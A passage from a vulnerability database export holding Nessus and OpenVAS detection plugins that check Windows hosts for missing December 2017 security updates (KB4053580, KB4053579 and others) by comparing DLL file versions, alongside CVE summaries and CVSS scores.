the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n \n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4047170/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4fb53fa\");\n # https://support.microsoft.com/en-us/help/4052303/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6218937f\");\n # https://support.microsoft.com/en-us/help/4053473/security-update-for-the-information-disclosure-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fae1fdfc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n - 4047170\n - 4052303\n - 4053473\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-12';\n\nkbs = make_list(\n \"4047170\",\n \"4052303\",\n \"4053473\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4052303\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rasserver_31bf3856ad364e35\", file_pat:\"^iprtprio\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24231'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4052303\", session:the_session);\n\n# 4053473\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"htmlhelp-infotech_31bf3856ad364e35\", file_pat:\"^itircl\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24233'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4053473\", session:the_session);\n\n# 4047170\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wmp.dll\", version:\"11.0.6002.24234\", min_version:\"11.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047170\"))\n vuln++;\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4053580", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053580)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053580)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812333\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\", \"CVE-2017-11911\",\n \"CVE-2017-11912\", \"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102045, 102085, 102086, 102087, 102092, 102055, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:15:18 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053580)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053580\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053580\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.785\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.785\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "description": "This host is missing a critical security\n update according to Microsoft KB4053579", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053579)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310812332", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812332", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053579)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812332\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102045, 102085, 102086, 102087, 102092, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095,\n 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:08:24 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053579)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053579\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2016\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053579\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2016:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1943\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.1943\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft KB4053578", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053578)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812331", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053578)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812331\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102045, 102085, 102086, 102087, 102092, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095,\n 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 08:56:15 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053578)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053578\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053578\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1294\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10586.0 - 11.0.10586.1294\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4054517", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054517)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11908", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812335", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812335", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054517)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812335\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11908\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11885\", \"CVE-2017-11886\",\n \"CVE-2017-11887\", \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\",\n \"CVE-2017-11893\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\",\n \"CVE-2017-11901\", \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\",\n \"CVE-2017-11913\", \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\",\n \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102045, 102052, 102085, 102086, 102087, 102092, 102055, 102062,\n 102063, 102065, 102080, 102082, 102081, 102053, 102054, 102077,\n 102046, 102047, 102050, 102078, 102091, 102088, 102089, 102093,\n 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 10:19:32 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054517)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054517\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1709 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054517\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.124\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.124\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft KB4053581", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053581)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", 